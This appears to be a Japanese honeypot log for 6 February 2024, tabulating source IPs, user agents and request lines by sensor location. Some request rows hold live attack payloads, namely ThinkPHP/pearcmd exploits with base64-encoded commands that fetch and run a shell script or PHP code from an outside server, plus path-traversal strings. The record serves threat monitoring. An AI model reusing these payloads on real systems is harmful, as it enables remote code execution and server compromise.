2024/02/06 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/02/06分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為

を確認しました。

Location:UK

CensysInspectによるスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：159 (前日比：12)
US：総アクセス数：70 (前日比：-27)
UK：総アクセス数：68 (前日比：-53)
SG：総アクセス数：234 (前日比：119)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	3.67.201.141	United States
1	3.70.218.181	United States
4	3.253.35.29	United States
1	34.209.164.218	United States
2	35.243.160.108	United States
32	42.192.92.229	China
1	45.56.108.128	United States
5	45.95.147.236	Netherlands
1	45.128.232.191	Bulgaria
1	51.83.75.133	France
1	64.62.197.168	United States
2	78.153.140.175	Russia
1	80.94.92.60	Romania
1	83.97.73.245	Germany
1	89.190.156.234	United States
2	91.92.245.67	Bulgaria
1	104.192.0.61	United States
4	118.193.59.237	Hong Kong
1	119.203.143.121	South Korea
1	134.122.26.255	United States
11	135.125.217.54	France
4	135.125.246.110	France
6	148.153.45.234	United States
45	150.109.234.88	Singapore
1	159.89.160.148	United States
2	183.136.225.9	China
1	184.73.85.208	United States
4	185.142.236.34	Seychelles
1	185.216.71.4	Bulgaria
8	185.254.196.173	Ukraine
3	185.254.196.186	Ukraine
1	192.241.226.54	United States
1	192.241.227.61	United States
1	193.222.96.13	Bulgaria
2	198.235.24.6	United States
2	198.235.24.32	United States
1	223.199.184.60	China

UserAgent一覧

件数	UserAgent
93	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36`
3	`Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`Python-urllib/3.10`
1	`mukewang/7.2.0 (iPhone; iOS 12.3.1; Scale/2.00) webview`
3	`python-requests/2.25.1`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x17\x01`
6		`\x16\x03\x01`
1	CONNECT	`api6[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`pro.ip-api[.]com:443`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
4	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/4Dxm`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/assets/.git/config`	HTTP/1.1
1	GET	`/blogs/.git/config`	HTTP/1.1
1	GET	`/config/.git/config`	HTTP/1.1
1	GET	`/css/.git/config`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?eval(base64_decode('aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9'));?>+/tmp/index.php`	HTTP/1.1
1	GET	`/index.php?s=/index/ hink`
1	GET	`/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=\|base64${IFS}-d\|sh`	HTTP/1.1
1	GET	`/jquery-3.3.1.slim.min.js`	HTTP/1.1
1	GET	`/jquery-3.3.2.slim.min.js`	HTTP/1.1
1	GET	`/lbU9`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/public/index.php?s=/index/ hink`
3	GET	`/robots.txt`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/v3/time`	HTTP/1.1
2	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/api/v0/id`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.242.35.59	United States
3	23.94.160.145	United States
2	34.90.71.74	United States
2	35.177.96.17	United States
1	37.120.238.251	Romania
1	45.79.172.21	United States
2	45.79.181.223	United States
5	45.95.147.236	Netherlands
1	45.128.232.191	Bulgaria
5	54.36.115.221	France
1	64.62.197.213	United States
1	65.49.1.25	United States
1	65.49.1.29	United States
1	65.49.1.31	United States
2	78.153.140.175	Russia
1	80.66.88.215	Russia
2	83.97.73.245	Germany
1	89.190.156.234	United States
8	90.151.171.106	Russia
5	90.151.171.108	Russia
8	95.214.235.169	Ukraine
1	113.73.187.198	China
1	139.59.101.104	Singapore
3	144.91.107.42	Germany
1	152.89.198.67	Russia
1	162.120.71.104	United States
1	162.243.150.36	United States
2	167.248.133.191	United States
1	192.241.225.73	United States
1	192.241.236.53	United States
2	198.235.24.11	United States
2	205.210.31.105	United States

UserAgent一覧

件数	UserAgent
20	`-`
1	`Go-http-client/1.1`
3	`Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0`
6	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
7	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
15	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
11		`\x16\x03\x01`
1		`\xad\x99\x18\xd0u\x1b\xb1\x99`\x18\x04\xb0~\x02`
1		`\xc3\x14Y\xb60`	\x87a`\x10\x04\xb0\t\x93
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
2	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
1	CONNECT	`fingerprints[.]bablosoft[.]com:443`	HTTP/1.1
1	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
17	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/cdn-cgi/trace`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/index`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?eval(base64_decode('aWYoZmlsdGVyX3ZhcihpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSxGSUxURVJfVkFMSURBVEVfQk9PTEVBTikpe2V2YWwoZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpKTt9ZWxzZXskaD1jdXJsX2luaXQoImh0dHA6Ly85My4xMjMuMzkuNzYveCIpO2N1cmxfc2V0b3B0KCRoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGgsQ1VSTE9QVF9IRUFERVIsMCk7ZXZhbChjdXJsX2V4ZWMoJGgpKTtjdXJsX2Nsb3NlKCRoKTt9'));?>+/tmp/index.php`	HTTP/1.1
1	GET	`/index.php?s=/index/ hink`
1	GET	`/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly85My4xMjMuMzkuNzYvaHVqLnNoIHwgc2g=\|base64${IFS}-d\|sh`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/public/index.php?s=/index/ hink`
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//api[.]ipify[.]org?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z73802194750Q1`	HTTP/1.1
1	HEAD	`/.env`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.126.207.43	United States
2	18.133.232.166	United States
2	18.170.222.216	United States
2	34.88.6.246	United States
1	45.79.172.21	United States
3	45.79.181.223	United States
1	45.128.232.191	Bulgaria
4	54.37.79.75	France
1	65.49.20.66	United States
3	74.82.47.3	United States
2	78.153.140.175	Russia
2	78.153.140.177	Russia
2	83.97.73.245	Germany
1	89.190.156.234	United States
4	90.151.171.106	Russia
2	90.151.171.108	Russia
8	95.214.235.169	Ukraine
1	105.120.130.255	Nigeria
1	107.170.236.5	United States
1	107.170.252.56	United States
1	117.184.26.242	China
1	139.59.101.104	Singapore
1	146.70.214.23	Romania
6	165.154.36.105	Hong Kong
2	167.94.138.49	United States
1	172.105.128.11	United States
2	183.136.225.32	China
1	192.241.200.73	United States
2	198.235.24.134	United States
2	205.210.31.46	United States
4	211.48.20.136	South Korea
1	223.25.246.104	Malaysia

UserAgent一覧

件数	UserAgent
26	`-`
2	`Go-http-client/1.1`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
2	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z72612114222Q1`
2	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
1	`Mozilla/5.0 (Windows NT 9_0_1; Win64; x64) AppleWebKit/599.45 (KHTML, like Gecko) Chrome/101.0.1771 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 9_1; Win64; x64) AppleWebKit/548.52 (KHTML, like Gecko) Chrome/67.0.1773 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
14	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/598.46 (KHTML, like Gecko) Chrome/90.0.1528 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`'\xbf\xbf\xde\xd8\x1f>\xa2`\x18\x04\xb0Z\xd2`
1		`*\xaf\xef\x9b\x15\xa8p\xea`\x04\x04\xb0`
3		`-`
2		`\x16\x03\x01\x01H\x01`
11		`\x16\x03\x01`
1		`\x9d\xe1\x8c-\xf4\x0c\x91S`\x18\x04\xb0\xfa\xc7`
1		`\xa3\xbfz\xbc\xb3\xd7\xe6M`\x04\x04\xb0{\x9c`
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
14	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//api[.]ipify[.]org?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z72612114222Q1`	HTTP/1.1
2	HEAD	`/.env`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.120.229.113	United States
1	8.137.106.178	Singapore
2	34.121.31.177	United States
1	45.56.108.128	United States
2	45.79.172.21	United States
1	45.79.181.223	United States
5	45.95.147.236	Netherlands
1	45.128.232.191	Bulgaria
2	51.159.103.17	France
6	54.36.115.221	France
4	54.37.79.75	France
1	60.13.138.6	China
1	64.62.197.19	United States
1	64.62.197.23	United States
1	64.62.197.27	United States
1	66.45.237.154	United States
1	74.82.47.3	United States
2	78.153.140.177	Russia
2	83.97.73.245	Germany
1	89.190.156.234	United States
8	95.214.235.169	Ukraine
145	139.162.7.59	Netherlands
2	143.198.204.194	United States
1	149.102.225.109	United States
1	159.203.208.23	United States
2	162.142.125.213	United States
2	162.142.125.221	United States
1	162.243.131.25	United States
6	165.154.36.105	Hong Kong
13	167.71.40.244	United States
2	167.94.138.52	United States
2	167.94.145.55	United States
3	172.105.128.11	United States
3	179.43.143.42	Panama
1	185.36.81.23	United Kingdom
1	194.165.16.76	Panama
2	198.235.24.28	United States
2	198.235.24.234	United States

UserAgent一覧

件数	UserAgent
28	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 OPR/48.1.2331.132804`
1	`Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36`
3	`Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1_2) AppleWebKit/561.50 (KHTML, like Gecko) Chrome/105.0.1848 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2_1) AppleWebKit/587.45 (KHTML, like Gecko) Chrome/95.0.314 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/573.48 (KHTML, like Gecko) Chrome/105.0.2705 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
143	`curl/7.54.0`
1	`curl/7.81.0`
1	`curl/8.1.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x02`
15		`\x16\x03\x01`
